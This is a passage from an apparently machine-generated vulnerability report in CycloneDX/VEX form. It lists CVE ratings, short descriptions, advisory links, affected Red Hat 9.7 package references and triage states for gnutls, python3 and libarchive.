"advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-42010" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-42010" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42010" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-42010" } ], "published": "2026-05-07T12:16:17+00:00", "updated": "2026-05-07T15:16:09+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-42011", "ratings": [ { "source": { "name": "redhat" }, "score": 7.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], "cwes": [ 295 ], "description": "A flaw was found in gnutls. This vulnerability occurs because permitted name constraints were incorrectly ignored when previous Certificate Authorities (CAs) only had excluded name constraints. A remote attacker could exploit this to bypass critical name constraint checks during certificate validation. This bypass could lead to the acceptance of invalid certificates, potentially enabling spoofing or man-in-the-middle attacks against affected systems.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-42011" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-42011" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42011" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-42011" } ], "published": "2026-05-07T15:16:09+00:00", "updated": "2026-05-07T15:48:55+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4224", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "rocky" }, "severity": "high" } ], "cwes": [ 674 ], "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4224" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4224" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a" }, { "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785" }, { "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee" }, { "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3" }, { "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768" }, { "url": "https://github.com/python/cpython/issues/145986" }, { "url": "https://github.com/python/cpython/pull/145987" }, { "url": "https://linux.oracle.com/cve/CVE-2026-4224.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224" } ], "published": "2026-03-16T18:16:10+00:00", "updated": "2026-04-08T13:16:41+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4424", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.", "recommendation": "Upgrade libarchive to version 3.5.3-9.el9_7", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4424" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10065" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10097" }, { "url": "https://access.redhat.com/errata/RHSA-2026:11768" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12071" }, { "url": "https://access.redhat.com/errata/RHSA-2026:12274" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13812" }, { "url": "https://access.redhat.com/errata/RHSA-2026:14937" }, { "url": "https://access.redhat.com/errata/RHSA-2026:16174" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8492" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8510" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8517" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8521" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8534" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8864" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8865" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8866" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8867" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8873" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8908" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8944" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9026" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9592" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9832" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4424" }, { "url": "https://bugzilla.redhat.com/2449006" }, { "url": "https://bugzilla.redhat.com/2452945" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4424" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5121" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-8510.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:8510" }, { "url": "https://github.com/libarchive/libarchive/pull/2898" }, { "url": "https://linux.oracle.com/cve/CVE-2026-4424.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-8534.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4424" } ], "published": "2026-03-19T15:16:28+00:00", "updated": "2026-05-12T10:16:46+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-4426", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 1335 ], "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4426" }, { "url": "https://access.redhat.com/errata/RHSA-2026:8944" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4426" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010" }, { "url": "https://github.com/libarchive/libarchive/pull/2897" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426" } ], "published": "2026-03-19T15:16:28+00:00", "updated": "2026-05-03T21:16:11+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 